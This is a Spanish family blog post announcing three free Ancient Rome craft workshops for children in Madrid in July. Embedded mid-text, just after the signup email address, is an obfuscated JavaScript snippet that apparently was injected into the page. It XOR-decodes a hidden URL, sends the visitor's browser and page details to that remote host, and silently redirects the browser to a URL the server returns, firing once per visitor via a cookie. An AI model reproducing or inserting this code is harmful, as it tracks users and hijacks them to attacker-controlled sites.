Vacaciones en Roma sin salir de Madrid

El verano con niños en Madrid puede ser algo agobiante y asfixiante por el calor, pero también algo muy divertido si damos con las actividades adecuadas para ellos. ¿Conoces todas las propuestas gratuitas que nos hacen desde el Club Small Travellers para julio? ¡Te las contamos! En Mamá tiene un plan siempre estamos buscando los mejores planes para las familias. Hace unas semanas descubrimos  el Club Small Travellers en B The Travel Brand Xperience  (Calle Miguel Ángel, 33) y… ¡nos encantó! Se trata de un lugar pensado para que los más pequeños de la casa pasen una mañana divertida, pero también educativa a través de distintos talleres de expresión plástica.

La temática principal, como no podría ser de otra manera al tratarse de una agencia de viajes, gira alrededor de un continente, una ciudad o una época histórica a través de la cual los asistentes pueden ir descubriendo otras costumbres, otras tradiciones, otras formas de vida y otros elementos de culturas de otros países diferentes al nuestro. Y es que con el juego también se puede aprender y, por eso, nos gusta esta iniciativa.

Julio en B the Travel Brand Xperience

Para todos aquellos que eligen agosto para irse a la playa y tienen que pasar el mes de julio en la capital, el Club Small Travellers propone una aventura de película: llenar la maleta de imaginación, creatividad y muchas ganas de pasárselo bien para realizar un viaje en el tiempo que les traslade hasta la Antigua Roma a través de tres talleres que les sumergerán en esta civilización. ¿Suena bien, verdad?

taller verano

¿A quién no le gustaría tener su propio casco romano, un símbolo de poder y fuerza en aquella época? En el primer taller del próximo 3 de julio, los niños aprenderán a hacerse uno. Un homenaje a esos soldados que conquistaron ciudades ataviados con este característico objeto. La semana siguiente, el 10 de julio, le toca el turno a otro elemento destacado de esta sociedad: la armadura, porque… ¿qué es un casco si no se dispone de una armadura que proteja en las batallas? Pero este instrumento será especial, porque los niños lo realizarán con materiales de reciclaje, y es que la diversión no tiene que estar reñida con el cuidado del medio ambiente.

Por último, en el taller  del 17 de julio, se hablará de arte y, en concreto, de cómo creaban los mosaicos. Sabemos que con mucha paciencia (je, je, je), pero en esta propuesta se imitará esta curiosa técnica con la que “pintaban” mezclando diferentes piedras de colores llamadas teselas, con las que iban creando un dibujo. Y lo harán utilizando gomaeva, un material que “da mucho juego”.

vacaciones en romaTodos los talleres son gratuitos, se realizan un martes y se celebran a las 12.00 horas. Para inscribirte, lo único que tienes que hacer es escribir un mail a la siguiente dirección de correo electrónico: flagship.xperience@bthetravelbrand.com ¿Quién se anima? ¡Nosotros ya hemos reservado la plaza! ¡No nos lo perdemos por nada del mundo!var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *